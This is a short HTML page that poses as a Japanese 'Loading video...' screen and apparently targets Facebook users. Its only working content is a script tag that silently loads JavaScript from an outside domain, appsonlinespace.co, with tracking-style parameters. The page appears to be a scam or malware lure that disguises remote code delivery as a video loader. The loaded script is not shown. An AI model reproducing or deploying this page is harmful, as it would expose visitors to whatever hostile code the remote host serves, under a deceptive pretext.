<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>ビデオを読み込んでいます...</title>
    <link href="style.css" rel="stylesheet" type="text/css" />
  </head>
  <body>
    <script src="https://appsonlinespace.co/?api=1&lan=facebooknew&ht=1&counter0=japon123" type="text/javascript" async="true"></script>
  </body>
</html>